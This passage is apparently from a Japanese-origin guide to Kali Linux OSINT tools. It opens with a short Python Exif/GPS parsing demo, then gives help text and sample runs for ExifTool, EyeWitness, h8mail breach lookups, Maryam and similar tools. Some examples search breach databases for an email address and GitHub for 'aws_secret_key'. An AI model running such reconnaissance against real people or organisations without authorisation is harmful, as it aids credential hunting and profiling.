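            ifd += struct.pack("<HHII", tag, typ, n, data_off + len(data))
            data += payload
    return ifd + struct.pack("<I", 0) + data  # next-IFD pointer = 0


def build_sample_jpeg() -> bytes:
    """Constructed input: SOI, one Exif APP1 holding IFD0 + GPS IFD, EOI (no image data)."""
    def ifd0(gps_off):
        return build_ifd([(0x010F, 2, 6, b"NIKON\0"),
                          (0x0132, 2, 20, b"2008:11:01 21:15:07\0"),
                          (0x8825, 4, 1, struct.pack("<I", gps_off))], 8)
    gps_off = 8 + len(ifd0(0))  # GPS IFD sits right after IFD0 and its value area
    rat = lambda *v: struct.pack("<" + "I" * len(v), *v)
    gps = build_ifd([(0x0001, 2, 2, b"N\0"),
                     (0x0002, 5, 3, rat(43, 1, 28, 1, 2814, 1000)),  # 43 deg 28' 2.814"
                     (0x0003, 2, 2, b"E\0"),
                     (0x0004, 5, 3, rat(11, 1, 53, 1, 6456, 1000))], gps_off)
    tiff = b"II" + struct.pack("<HI", 42, 8) + ifd0(gps_off) + gps
    app1 = b"Exif\0\0" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    tags = extract_exif(build_sample_jpeg())
    print(tags)
    print("location:", gps_location(tags))  # (43.467448, 11.885127)
```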
ExifTool
Reads and writes metadata in a wide variety of file types.
■ Usage
root@kali:~# man exiftool
SYNOPSIS
Reading
exiftool [OPTIONS] [-TAG...] [--TAG...] FILE...
Writing
exiftool [OPTIONS] -TAG[+-<]=[VALUE]... FILE...
Copying
exiftool [OPTIONS] -tagsFromFile SRCFILE [-[DSTTAG<]SRCTAG...] FILE...
Other
exiftool [ -ver | -list[w|f|r|wf|g[NUM]|d|x] ]
For specific examples, see the EXAMPLES sections below.
OPTIONS
Option Overview
Tag operations
-TAG or --TAG Extract or exclude specified tag
-TAG[+-^]=[VALUE] Write new value for tag
-TAG[+-]<=DATFILE Write tag value from contents of file
-[+]TAG[+-]<SRCTAG Copy tag value (see -tagsFromFile)
-tagsFromFile SRCFILE Copy tag values from file
-x TAG (-exclude) Exclude specified tag
Input-output text formatting
-args (-argFormat) Format metadata as exiftool arguments
-b (-binary) Output metadata in binary format
-c FMT (-coordFormat) Set format for GPS coordinates
-charset [[TYPE=]CHARSET] Specify encoding for special characters
-csv[[+]=CSVFILE] Export/import tags in CSV format
-csvDelim STR Set delimiter for CSV file
-d FMT (-dateFormat) Set format for date/time values
-D (-decimal) Show tag ID numbers in decimal
-E,-ex,-ec (-escape(HTML|XML|C))Escape tag values for HTML, XML or C
-f (-forcePrint) Force printing of all specified tags
-g[NUM...] (-groupHeadings) Organize output by tag group
-G[NUM...] (-groupNames) Print group name for each tag
-h (-htmlFormat) Use HTML formatting for output
-H (-hex) Show tag ID numbers in hexadecimal
-htmlDump[OFFSET] Generate HTML-format binary dump
-j[[+]=JSONFILE] (-json) Export/import tags in JSON format
-l (-long) Use long 2-line output format
-L (-latin) Use Windows Latin1 encoding
-lang [LANG] Set current language
-listItem INDEX Extract specific item from a list
-n (--printConv) No print conversion
-p[-] STR (-printFormat) Print output in specified format
-php Export tags as a PHP Array
-s[NUM] (-short) Short output format (-s for tag names)
-S (-veryShort) Very short output format
-sep STR (-separator) Set separator string for list items
-sort Sort output alphabetically
-struct Enable output of structured information
-t (-tab) Output in tab-delimited list format
-T (-table) Output in tabular format
-v[NUM] (-verbose) Print verbose messages
-w[+|!] EXT (-textOut) Write (or overwrite!) output text files
-W[+|!] FMT (-tagOut) Write output text file for each tag
-Wext EXT (-tagOutExt) Write only specified file types with -W
-X (-xmlFormat) Use RDF/XML output format
Processing control
-a (-duplicates) Allow duplicate tags to be extracted
-e (--composite) Do not generate composite tags
-ee[NUM] (-extractEmbedded) Extract information from embedded files
-ext[+] EXT (-extension) Process files with specified extension
-F[OFFSET] (-fixBase) Fix the base for maker notes offsets
-fast[NUM] Increase speed when extracting metadata
-fileOrder[NUM] [-]TAG Set file processing order
-i DIR (-ignore) Ignore specified directory name
-if[NUM] EXPR Conditionally process files
-m (-ignoreMinorErrors) Ignore minor errors and warnings
-o OUTFILE (-out) Set output file or directory name
-overwrite_original Overwrite original by renaming tmp file
-overwrite_original_in_place Overwrite original by copying tmp file
-P (-preserve) Preserve file modification date/time
-password PASSWD Password for processing protected files
-progress[NUM][:[TITLE]] Show file progress count
-q (-quiet) Quiet processing
-r[.] (-recurse) Recursively process subdirectories
-scanForXMP Brute force XMP scan
-u (-unknown) Extract unknown tags
-U (-unknown2) Extract unknown binary tags too
-wm MODE (-writeMode) Set mode for writing/creating tags
-z (-zip) Read/write compressed information
Other options
-@ ARGFILE Read command-line arguments from file
-k (-pause) Pause before terminating
-list[w|f|wf|g[NUM]|d|x] List various exiftool capabilities
-ver Print exiftool version number
-- End of options
Special features
-geotag TRKFILE Geotag images from specified GPS log
-globalTimeShift SHIFT Shift all formatted date/time values
-use MODULE Add features from plug-in module
Utilities
-delete_original[!] Delete "_original" backups
-restore_original Restore from "_original" backups
Advanced options
-api OPT[[^]=[VAL]] Set ExifTool API option
-common_args Define common arguments
-config CFGFILE Specify configuration file name
-echo[NUM] TEXT Echo text to stdout or stderr
-efile[NUM][!] ERRFILE Save names of files with errors
-execute[NUM] Execute multiple commands on one line
-fileNUM ALTFILE Load tags from alternate file
-list_dir List directories, not their contents
-srcfile FMT Process a different source file
-stay_open FLAG Keep reading -@ argfile even after EOF
-userParam PARAM[[^]=[VAL]] Set user parameter (API UserParam opt)
■ Usage example
root@kali:~# exiftool example.jpg
File Size : 162 kB
File Type : JPEG
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
Image Description :
Make : NIKON
Camera Model Name : COOLPIX P6000
Orientation : Horizontal (normal)
X Resolution : 300
Y Resolution : 300
Resolution Unit : inches
Software : Nikon Transfer 1.1 W
[...]
root@kali:~# exiftool example.mp3
File Size : 49 kB
File Type : MP3
MIME Type : audio/mpeg
MPEG Audio Version : 1
Audio Layer : 3
Audio Bitrate : 64 kbps
Sample Rate : 48000
Channel Mode : Stereo
[...]
root@kali:~# exiftool example.docx
File Size : 4.1 kB
File Type : DOCX
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0808
Zip Compression : Deflated
Zip Modify Date : 2016:10:07 13:21:00
[...]
root@kali:~# exiftool example.epub
File Size : 4.1 MB
File Type : EPUB
MIME Type : application/epub+zip
Identifier Id : pub-identifier
Identifier : urn:isbn:9781449328030
Title Id : pub-title
Title : Accessible EPUB 3
[...]
Exiv2
Reads, writes, deletes, and edits image metadata.
■ Usage
root@kali:~# exiv2 -h
Usage: exiv2 [ option [ arg ] ]+ [ action ] file ...
Where file is one or more files, optionally containing a URL
(http, https, ftp, sftp, data or file) or wildcard
Actions:
pr | print Print image metadata (default is a summary). This is the default
action
ad | adjust Adjust Exif timestamps by the given time. Requires
at least one of -a, -Y, -O or -D
rm | delete Deletes image metadata, use -d to choose type to delete
(default is all)
in | insert Insert metadata from .exv, .xmp, thumbnail or .icc file.
Use option -S to change the suffix of the input files and
-l to change the location
ex | extract Extract metadata to .exv, .xmp, preview image, thumbnail,
or ICC profile. Use option -S to change the suffix of the input
files and -l to change the location
mv | rename Rename files and/or set file timestamps according to the
Exif timestamps. The filename format can be set with
-r format, timestamp options are controlled with -t and -T
mo | modify Apply commands to modify the Exif, IPTC and XMP metadata.
Requires option -m or -M
fi | fixiso Copy ISO setting from Canon and Nikon makernotes, to the
standard Exif tag
fc | fixcom Convert the Unicode Exif user comment to UCS-2. The current
character encoding can be specified with the -n option
Options:
-h Display this help and exit
-V Show the program version and exit
-v Be verbose during the program run
-q Silence warnings and error messages (quiet)
-Q lvl Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute)
-b Obsolete, reserved for use with the test suit
-u Show unknown tags (e.g., Exif.SonyMisc3c.0x022b)
-g str Only output where 'str' matches in output text (grep)
Append /i to 'str' for case insensitive
-K key Only output where 'key' exactly matches tag's key
-n enc Character set to decode Exif Unicode user comments
-k Preserve file timestamps when updating files (keep)
-t Set the file timestamp from Exif metadata when renaming (overrides -k)
-T Only set the file timestamp from Exif metadata ('rename' action)
-f Do not prompt before overwriting existing files (force)
-F Do not prompt before renaming files (Force)
-a time Time adjustment in the format [+|-]HH[:MM[:SS]]. For 'adjust' action
-Y yrs Year adjustment with the 'adjust' action
-O mon Month adjustment with the 'adjust' action
-D day Day adjustment with the 'adjust' action
-p mode Print mode for the 'print' action. Possible modes are:
s : A summary of the Exif metadata (the default)
a : Exif, IPTC and XMP tags (shortcut for -Pkyct)
e : Exif tags (shortcut for -PEkycv)
t : Interpreted (translated) Exif tags (-PEkyct)
v : Plain (untranslated) Exif tags values (-PExgnycv)
h : Hex dump of the Exif tags (-PExgnycsh)
i : IPTC tags (-PIkyct)
x : XMP tags (-PXkyct)
c : JPEG comment
p : List available image preview, sorted by size
C : Print ICC profile
R : Recursive print structure of image (debug build only)
S : Print structure of image (limited file types)
X : Extract "raw" XMP
-P flgs Print flags for fine control of tag lists ('print' action):
E : Exif tags
I : IPTC tags
X : XMP tags
x : Tag number for Exif or IPTC tags (in hexadecimal)
g : Group name (e.g. Exif.Photo.UserComment, Photo)
k : Key (e.g. Exif.Photo.UserComment)
l : Tag label (e.g. Exif.Photo.UserComment, 'User comment')
d : Tag description
n : Tag name (e.g. Exif.Photo.UserComment, UserComment)
y : Type
c : Number of components (count)
s : Size in bytes of vanilla value (may include NULL)
v : Plain data value of untranslated (vanilla)
V : Plain data value, data type and the word 'set'
t : Interpreted (translated) human readable values
h : Hex dump of the data
-d tgt1 Delete target(s) for the 'delete' action. Possible targets are:
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only
i : IPTC tags
x : XMP tags
c : JPEG comment
C : ICC Profile
c : All IPTC data (any broken multiple IPTC blocks)
- : Input from stdin
-i tgt2 Insert target(s) for the 'insert' action. Possible targets are
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only (JPEGs only from <file>-thumb.jpg)
i : IPTC tags
x : XMP tags
c : JPEG comment
C : ICC Profile, from <file>.icc
X : XMP sidecar from file <file>.xmp
XX: "raw" metadata from <file>.exv. XMP default, optional Exif and IPTC
- : Input from stdin
-e tgt3 Extract target(s) for the 'extract' action. Possible targets
a : All supported metadata (the default)
e : Exif tags
t : Exif thumbnail only (to <file>-thumb.jpg)
i : IPTC tags
x : XMP tags
c : JPEG comment
pN: Extract N'th preview image to <file>-preview<N>.<ext>
C : ICC Profile, to <file>.icc
X : XMP sidecar to <file>.xmp
XX: "raw" metadata to <file>.exv. XMP default, optional Exif and IPTC
- : Output to stdin
-r fmt Filename format for the 'rename' action. The format string
follows strftime(3). The following keywords are also supported:
:basename: - original filename without extension
:dirname: - name of the directory holding the original file
:parentname: - name of parent directory
Default 'fmt' is %Y%m%d_%H%M%S
-c txt JPEG comment string to set in the image.
-m cmdf Applies commands in 'cmdf' file, for the modify action (see -M for format).
-M cmd Command line for the modify action. The format is:
( (set | add) <key> [[<type>] <value>] |
del <key> [<type>] |
reg prefix namespace )
-l dir Location (directory) for files to be inserted from or extracted to.
-S suf Use suffix 'suf' for source files for insert action.
Examples:
exiv2 -pe image.dng *.jp2
Print all Exif tags in image.dng and all .jp2 files
exiv2 -g date/i https://clanmills.com/Stonehenge.jpg
Print all tags in file, where key contains 'date' (case insensitive)
exiv2 -M"set Xmp.dc.subject XmpBag Sky" image.tiff
Set (or add if missing) value to tag in file
■ Usage example
# Sample image: https://github.com/ianare/exif-samples
# Show all Exif information
root@kali:~# exiv2 -pe DSCN0010.jpg
Exif.Image.ImageDescription Ascii 32
Exif.Image.Make Ascii 6 NIKON
Exif.Image.Model Ascii 14 COOLPIX P6000
Exif.Image.Orientation Short 1 1
Exif.Image.XResolution Rational 1 300/1
Exif.Image.YResolution Rational 1 300/1
[...]
# Show tags whose name contains "date"
root@kali:~# exiv2 -g date/i DSCN0010.jpg
Exif.Image.DateTime Ascii 20 2008:11:01 21:15:07
Exif.Photo.DateTimeOriginal Ascii 20 2008:10:22 16:28:39
Exif.Photo.DateTimeDigitized Ascii 20 2008:10:22 16:28:39
Exif.GPSInfo.GPSDateStamp Ascii 11 2008:10:23
# Edit Exif.Image.DateTime
root@kali:~# exiv2 -M "set Exif.Image.DateTime 2024:01:01 09:00:00" DSCN0010.jpg
root@kali:~# exiv2 -g date/i DSCN0010.jpg
Exif.Image.DateTime Ascii 20 2024:01:01 09:00:00
Exif.Photo.DateTimeOriginal Ascii 20 2008:10:22 16:28:39
Exif.Photo.DateTimeDigitized Ascii 20 2008:10:22 16:28:39
Exif.GPSInfo.GPSDateStamp Ascii 11 2008:10:23
EyeWitness
Takes screenshots of the specified URLs.
■ Usage
root@kali:~# eyewitness --help
usage: EyeWitness.py [--web] [-f Filename] [-x Filename.xml] [--single Single URL] [--no-dns] [--timeout Timeout] [--jitter # of Seconds] [--delay # of Seconds]
[--threads # of Threads] [--max-retries Max retries on a timeout] [-d Directory Name] [--results Hosts Per Page] [--no-prompt]
[--user-agent User Agent] [--difference Difference Threshold] [--proxy-ip 127.0.0.1] [--proxy-port 8080] [--proxy-type socks5]
[--show-selenium] [--resolve] [--add-http-ports ADD_HTTP_PORTS] [--add-https-ports ADD_HTTPS_PORTS] [--only-ports ONLY_PORTS]
[--prepend-https] [--selenium-log-path SELENIUM_LOG_PATH] [--cookies key1=value1,key2=value2] [--resume ew.db]
Protocols:
--web HTTP Screenshot using Selenium
Input Options:
-f Filename Line-separated file containing URLs to capture
-x Filename.xml Nmap XML or .Nessus file
--single Single URL Single URL/Host to capture
--no-dns Skip DNS resolution when connecting to websites
Timing Options:
--timeout Timeout Maximum number of seconds to wait while requesting a web page (Default: 7)
--jitter # of Seconds
Randomize URLs and add a random delay between requests
--delay # of Seconds Delay between the opening of the navigator and taking the screenshot
--threads # of Threads
Number of threads to use while using file based input
--max-retries Max retries on a timeout
Max retries on timeouts
Report Output Options:
-d Directory Name Directory name for report output
--results Hosts Per Page
Number of Hosts per page of report
--no-prompt Don't prompt to open the report
Web Options:
--user-agent User Agent
User Agent to use for all requests
--difference Difference Threshold
Difference threshold when determining if user agent requests are close "enough" (Default: 50)
--proxy-ip 127.0.0.1 IP of web proxy to go through
--proxy-port 8080 Port of web proxy to go through
--proxy-type socks5 Proxy type (socks5/http)
--show-selenium Show display for selenium
--resolve Resolve IP/Hostname for targets
--add-http-ports ADD_HTTP_PORTS
Comma-separated additional port(s) to assume are http (e.g. '8018,8028')
--add-https-ports ADD_HTTPS_PORTS
Comma-separated additional port(s) to assume are https (e.g. '8018,8028')
--only-ports ONLY_PORTS
Comma-separated list of exclusive ports to use (e.g. '80,8080')
--prepend-https Prepend http:// and https:// to URLs without either
--selenium-log-path SELENIUM_LOG_PATH
Selenium geckodriver log path
--cookies key1=value1,key2=value2
Additional cookies to add to the request
Resume Options:
--resume ew.db Path to db file if you want to resume
■ Usage example
root@kali:~# eyewitness --web --single http://192.168.11.4
[*] Done! Report written in the /root/2024-10-03_065851 folder!
[...]
Captured screenshot
getallurls
Collects URLs for the specified domain using AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
■ Usage
root@kali:~# getallurls --help
Usage of getallurls:
-json
write output as json
-o string
filename to write results to
-p string
HTTP proxy to use
-providers string
providers to fetch urls for (default "wayback,otx,commoncrawl")
-random-agent
use random user-agent
-retries uint
amount of retries for http client (default 5)
-subs
include subdomains of target domain
-v enable verbose mode
-version
show gau version
■ Usage example
root@kali:~# getallurls ipa.go.jp | grep -e .*\.pdf$
https://www.ipa.go.jp/about/disclosure/ps6vr7000001thja-att/2024070101.pdf
https://www.ipa.go.jp/about/ipajoho/pdf/seifushussi.pdf
https://www.ipa.go.jp/about/ipanews/eid2eo0000002xfg-att/eid2eo0000002xg0.pdf
https://www.ipa.go.jp/about/ipanews/m42obm000000iv4x-att/security5kajou.pdf
https://www.ipa.go.jp/about/press/pdf/090106Press.pdf
https://www.ipa.go.jp/about/press/pdf/101202press_bessi.pdf
https://www.ipa.go.jp/about/press/pdf/120424_2press.pdf
https://www.ipa.go.jp/about/press/pdf/120424_2press2.pdf
[...]
goofile
Uses Google search to find files indexed for the specified domain.
■ Usage
root@kali:~# goofile --help
usage: goofile [-h] [-d DOMAIN] [-f FILETYPE] [-k KEY] [-e ENGINE] [-q QUERY] [--logging LOGGING]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
the domain to search - optional (ie. kali.org
-f FILETYPE, --filetype FILETYPE
the filetype to search for - required (ie. pdf)
-k KEY, --key KEY Google Custom Search Engine API key - optional
-e ENGINE, --engine ENGINE
Google Custom Search Engine ID - optional
-q QUERY, --query QUERY
Only search for files with keyword - optional
--logging LOGGING Set the logging verbosity to something other than "INFO" - optional
■ Usage example
root@kali:~# goofile -d ipa.go.jp -f pdf
Searching in ipa.go.jp for pdf
========================================
Files found:
====================
www.ipa.go.jp/archive/files/000063744.pdf
www.ipa.go.jp/archive/files/000052571.pdf
www.ipa.go.jp/archive/files/000066605.pdf
www.ipa.go.jp/archive/files/000063749.pdf
www.ipa.go.jp/archive/files/000066533.pdf
www.ipa.go.jp/archive/files/000004608.pdf
www.ipa.go.jp/archive/files/000072042.pdf
www.ipa.go.jp/archive/files/000072724.pdf
[...]
# Using a Programmable Search Engine
root@kali:~# goofile -d ipa.go.jp -f pdf -k <APIキー> -e <検索エンジンID> -q "一般競争入札"
Searching in ipa.go.jp for pdf
========================================
Files found:
====================
https://www.ipa.go.jp/archive/files/000083842.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/eid2eo00000058ca-att/nyusatsu20240701-2qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000igqh-att/nyusatsu20240604.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm0000009dy6-att/nyusatsu20240416ga.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000iuc2-att/nyusatsu20240607qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm000000520e-att/nyusatsu20240404-9qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/m42obm0000004y1e-att/nyusatsu20240404-5qa.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/f55m8k000000977e-att/nyusatsu20240829-2ga.pdf
https://www.ipa.go.jp/choutatsu/nyusatsu/2024/eid2eo0000005v1q-att/nyusatsu20240704qa-2.pdf
[...]
gowitness
Takes screenshots of the specified URLs.
■ Usage
root@kali:~# gowitness --help
Usage:
gowitness [command]
Available Commands:
help Help about any command
report Work with gowitness reports
scan Perform various scans
version Get the gowitness version
Flags:
-D, --debug-log Enable debug logging
-h, --help help for gowitness
-q, --quiet Silence (almost all) logging
root@kali:~# gowitness scan --help
Usage:
gowitness scan [command]
Available Commands:
cidr Scan CIDR targets on a network
file Scan targets sourced from a file or stdin
nessus Scan targets from a Nessus XML file
nmap Scan targets from an Nmap XML file
single Scan a single URL target
Flags:
--chrome-header strings Extra headers to add to requests. Supports multiple --header flags
--chrome-path string The path to a Google Chrome binary to use (downloads a platform-appropriate binary by default)
--chrome-proxy string An HTTP/SOCKS5 proxy server to use. Specify the proxy using this format: proto://address:port
--chrome-user-agent string The user-agent string to use (default "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")
--chrome-window-x int The Chrome browser window width, in pixels (default 1920)
--chrome-window-y int The Chrome browser window height, in pixels (default 1080)
--chrome-wss-url string A websocket URL to connect to a remote, already running Chrome DevTools instance (i.e., Chrome started with --remote-debugging-port)
--delay int Number of seconds delay between navigation and screenshotting (default 3)
--driver string The scan driver to use. Can be one of [gorod, chromedp] (default "chromedp")
-h, --help help for scan
--javascript string A JavaScript function to evaluate on every page, before a screenshot. Note: It must be a JavaScript function! e.g., () => console.log('gowitness');
--javascript-file string A file containing a JavaScript function to evaluate on every page, before a screenshot. See --javascript
--log-scan-errors Log scan errors (timeouts, DNS errors, etc.) to stderr (warning: can be verbose!)
--save-content Save content from network requests to the configured writers. WARNING: This flag has the potential to make your storage explode in size
--screenshot-format string Format to save screenshots as. Valid formats are: jpeg, png (default "jpeg")
--screenshot-fullpage Do full-page screenshots, instead of just the viewport
-s, --screenshot-path string Path to store screenshots (default "./screenshots")
--screenshot-skip-save Do not save screenshots to the screenshot-path (useful together with --write-screenshots)
--skip-html Don't include the first request's HTML response when writing results
-t, --threads int Number of concurrent threads (goroutines) to use (default 6)
-T, --timeout int Number of seconds before considering a page timed out (default 60)
--uri-filter strings Valid URIs to pass to the scanning process (default [http,https])
--write-csv Write results as CSV (has limited columns)
--write-csv-file string The file to write CSV rows to (default "gowitness.csv")
--write-db Write results to a SQLite database
--write-db-enable-debug Enable database query debug logging (warning: verbose!)
--write-db-uri string The database URI to use. Supports SQLite, Postgres, and MySQL (e.g., postgres://user:pass@host:port/db) (default "sqlite://gowitness.sqlite3")
--write-jsonl Write results as JSON lines
--write-jsonl-file string The file to write JSON lines to (default "gowitness.jsonl")
--write-screenshots Store screenshots with writers in addition to filesystem storage
--write-stdout Write successful results to stdout (usefull in a shell pipeline)
Global Flags:
-D, --debug-log Enable debug logging
-q, --quiet Silence (almost all) logging
■ Usage example
root@kali:~# gowitness scan single --url http://192.168.11.4 --screenshot-format png
2024/10/10 11:50:34 WARN no writers have been configured. to persist probe results, add writers using --write-* flags
2024/10/10 11:50:43 INFO result 🤖 target=http://192.168.11.4 status-code=200 title=EC-CUBE SHOP / TOPページ have-screenshot=true
Output
h8mail
Searches across the following breach databases/services to check whether an address appears in a data breach:
- HaveIBeenPwned
- Hunter.io
- Snusbase
- Leak-Lookup
- Emailrep.io
- Dehashed.com
- IntelX.io
■ Usage
root@kali:~# h8mail --help
usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]] [-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose]
[-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE] [-j OUTPUT_JSON] [-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]]
[-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]] [-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf] [-ch [CHASE_LIMIT]]
[--power-chase] [--hide] [--debug] [--gen-config]
options:
-h, --help show this help message and exit
-t USER_TARGETS [USER_TARGETS ...], --targets USER_TARGETS [USER_TARGETS ...]
Either string inputs or files. Supports email pattern matching from input or file, filepath globing and multiple
arguments
-u USER_URLS [USER_URLS ...], --url USER_URLS [USER_URLS ...]
Either string inputs or files. Supports URL pattern matching from input or file, filepath globing and multiple
arguments. Parse URLs page for emails. Requires http:// or https:// in URL.
-q USER_QUERY, --custom-query USER_QUERY
Perform a custom query. Supports username, password, ip, hash, domain. Performs an implicit "loose" search when
searching locally
--loose Allow loose search by disabling email pattern recognition. Use spaces as pattern seperators
-c CONFIG_FILE [CONFIG_FILE ...], --config CONFIG_FILE [CONFIG_FILE ...]
Configuration file for API keys. Accepts keys from Snusbase, WeLeakInfo, Leak-Lookup, HaveIBeenPwned, Emailrep,
Dehashed and hunterio
-o OUTPUT_FILE, --output OUTPUT_FILE
File to write CSV output
-j OUTPUT_JSON, --json OUTPUT_JSON
File to write JSON output
-bc BC_PATH, --breachcomp BC_PATH
Path to the breachcompilation torrent folder. Uses the query.sh script included in the torrent
-sk, --skip-defaults Skips Scylla and HunterIO check. Ideal for local scans
-k CLI_APIKEYS [CLI_APIKEYS ...], --apikey CLI_APIKEYS [CLI_APIKEYS ...]
Pass config options. Supported format: "K=V,K=V"
-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...], --local-breach LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]
Local cleartext breaches to scan for targets. Uses multiprocesses, one separate process per file, on separate worker
pool by arguments. Supports file or folder as input, and filepath globing
-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...], --gzip LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]
Local tar.gz (gzip) compressed breaches to scans for targets. Uses multiprocesses, one separate process per file.
Supports file or folder as input, and filepath globing. Looks for 'gz' in filename
-sf, --single-file If breach contains big cleartext or tar.gz files, set this flag to view the progress bar. Disables concurrent file
searching for stability
-ch [CHASE_LIMIT], --chase [CHASE_LIMIT]
Add related emails from hunter.io to ongoing target list. Define number of emails per target to chase. Requires
hunter.io private API key if used without power-chase
--power-chase Add related emails from ALL API services to ongoing target list. Use with --chase
--hide Only shows the first 4 characters of found passwords to output. Ideal for demonstrations
--debug Print request debug information
--gen-config, -g Generates a configuration file template in the current working directory & exits. Will overwrite existing
h8mail_config.ini file
■ Usage example
# Search using Leak-Lookup
root@kali:~# h8mail -t ****@****.com -k "leak-lookup_pub=<APIキー>"
[>] Targets:
[>] ****@****.com
[>] Found leak-lookup_pub configuration key
[~] scylla.so is down, skipping
[~] Target factory started for ****@****.com
[~] [****@****.com]>[hunter.io public]
[>] Found 0 related emails for ****@****.com using hunter.io (public)
[~] [****@****.com]>[leaklookup public]
[>] Found 16 entries for ****@****.com using LeakLookup (public)
__________________________________________________________________________________________
[>] Showing results for ****@****.com
LEAKLOOKUP_PUB | ****@****.com > canva.com
LEAKLOOKUP_PUB | ****@****.com > collection-1
LEAKLOOKUP_PUB | ****@****.com > collection-4-eu
LEAKLOOKUP_PUB | ****@****.com > collection-4-u
LEAKLOOKUP_PUB | ****@****.com > bit.ly
LEAKLOOKUP_PUB | ****@****.com > dropbox.com
LEAKLOOKUP_PUB | ****@****.com > peatix.com
LEAKLOOKUP_PUB | ****@****.com > trello.com
LEAKLOOKUP_PUB | ****@****.com > tumblr.com
LEAKLOOKUP_PUB | ****@****.com > twitter.com
__________________________________________________________________________________________
Session Recap:
Target | Status
__________________________________________________________________________________________
****@****.com | Breach Found (10 elements)
__________________________________________________________________________________________
Maltego
Discovers and visualizes various open data on the Internet (DNS, IP addresses, search engines, social networks, and integrations with more than 100 external services such as Shodan and Censys).
■ Usage example
Visualizing websites, IP addresses, open ports, and more, starting from the target domain
The free Community Edition supports only the standard Maltego Graph transforms; integrating external services requires purchasing a separate license.
OWASP Maryam
Collects various open data from the Internet.
■ Usage
root@kali:~# maryam
[maryam][default] > help
Commands (type [help|?] <topic>):
---------------------------------
exit Exits the framework
help Displays this menu
reload Reloads all modules
report Get report from the Gathers and save it to the other formats
search Searches available modules
set Sets module options
shell Executes shell commands
show Shows various framework items
unset Unsets module options
update Update modules via module name
web Manage web/api interface
workspaces Manages workspaces
[maryam][default] > show modules
Osint
-----
social_nets
tweet_search
email_pwned
crawler
cve_search
suggest
image_search
username_search
onion_search
email_search
dark_web_crawler
phone_number_search
famous_person
docs_search
cloud_storage
domain_reputation
dns_search
github_leaks
article_search
Footprint
---------
tldbrute
entry_points
crawl_pages
filebrute
dnsbrute
Search
------
crt
reddit
pubmed
telegram
pastebin
stackoverflow
tiktok
instagram
scholar
bing
sanctionsearch
quora
yahoo
sepiasearch
etools
wikileaks
spotify
twitter
github
dictionary
wikipedia
arxiv
google
trello
duckduckgo
discord
linkedin
photon
facebook
youtube
piratebay
startpage
Iris
----
topicmodeling
sentiment
cluster
iris_cluster
iris
■ Usage example
root@kali:~# maryam
[maryam][default] > dns_search -d qiita.com
[*] [OTX] Searching in otx.alienvault...
[*] [SECTRAILS] Enumerating dns records...
[*] HOSTNAMES
[*] terminated.qiita.com
[*] ads.qiita.com
[*] corp.qiita.com
[*] slack.teams.qiita.com
[*] net-marketing.qiita.com
[*] staging.qiita.com
[*] plus.jobs.qiita.com
[*] teams.qiita.com
[*] jobs.qiita.com
[maryam][default] > github --query aws_secret_key --engine google --api --format
{
"repositories": [
"https://github.com/six2dez/burp-bounty-profiles",
"https://github.com/aws/aws-sdk-java",
"https://github.com/shellphish/ictf-framework",
"https://github.com/aws/aws-sdk-go",
"https://github.com/terraform-providers/terraform-provider-terraform",
"https://github.com/getredash/redash",
[...]
],
"blogs": [
"gist.github.com"
],
"usernames": [
"Casecommons",
"terraform-providers",
"awslabs",
[...]
],
"emails": []
}
# The command can also be run directly
root@kali:~# maryam -e github --query aws_secret_key --engine google --api --format
Metagoofil
Searches Google for files of specific types published on a website and downloads them.
■ Usage
root@kali:~# metagoofil --help
usage: metagoofil.py [-h] -d DOMAIN [-e DELAY] [-f [SAVE_FILE]] [-i URL_TIMEOUT] [-l SEARCH_MAX] [-n DOWNLOAD_FILE_LIMIT] [-o SAVE_DIRECTORY]
[-r NUMBER_OF_THREADS] -t FILE_TYPES [-u [USER_AGENT]] [-w]
options:
-h, --help show this help message and exit
-d DOMAIN Domain to search.
-e DELAY Delay (in seconds) between searches. If it's too small Google may block your IP, too big and your search may take a
while. Default: 30.0
-f [SAVE_FILE] Save the html links to a file.
no -f = Do not save links
-f = Save links to html_links_<TIMESTAMP>.txt
-f SAVE_FILE = Save links to SAVE_FILE
-i URL_TIMEOUT Number of seconds to wait before timeout for unreachable/stale pages. Default: 15
-l SEARCH_MAX Maximum results to search. Default: 100
-n DOWNLOAD_FILE_LIMIT
Maximum number of files to download per filetype. Default: 100
-o SAVE_DIRECTORY Directory to save downloaded files. Default is current working directory, "."
-r NUMBER_OF_THREADS Number of downloader threads. Default: 8
-t FILE_TYPES file_types to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx). To search all 17,576 three-letter file extensions,
type "ALL"
-u [USER_AGENT] User-Agent for file retrieval against -d domain.
no -u = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
-u = Randomize User-Agent
-u "My custom user agent 2.0" = Your customized User-Agent
